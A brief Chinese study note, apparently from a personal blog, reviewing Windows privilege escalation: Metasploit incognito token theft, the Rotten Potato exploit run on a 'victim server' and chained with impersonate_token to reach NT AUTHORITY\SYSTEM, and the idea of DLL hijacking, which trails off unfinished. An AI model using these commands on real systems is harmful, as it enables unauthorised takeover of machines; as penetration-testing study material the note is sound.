今天又是不紧不慢的一天,复习一下windows提权手法吧
一.令牌窃取严格意义来说算不上提权,只是盗用别人的身份
先决条件你已经拿到对方的反弹shell
在msf上一波猛操作
1.查看现在的身份 :getuid
2.查看当前操作系统的信息 :sysinfo
3.msf自带令牌窃取工具可以直接使用 use incognito
4.因为拿到的只是普通用户,所以令牌截取只能搞到自己,可以用 list_token -u 查看系统具有的令牌,进行切换
二.烂土豆提权(它比热土豆可靠,全版本可用,立即生效,不需要像热土豆那样需要重启)
提权路径:
1.先把烂土豆的exp放在受害服务器的机器上
2.执行该exp
3.这个需要配合令牌盗取
use incognito;list_tokens -u;execute-cH -f ./potato.exe;list_tokens -u impersonate_token "NT AUTHORITY\\SYSTEM"
三.dll劫持
什么是dll?
windows程序启动的时候都需要dll,如果这些dll不存在,则可以通过在应用程序要查的位置放上我们的恶意dll.
一般程序加载dll的顺序是
原理简而言之就是伪造dll,欺骗应用程序从而的得以调用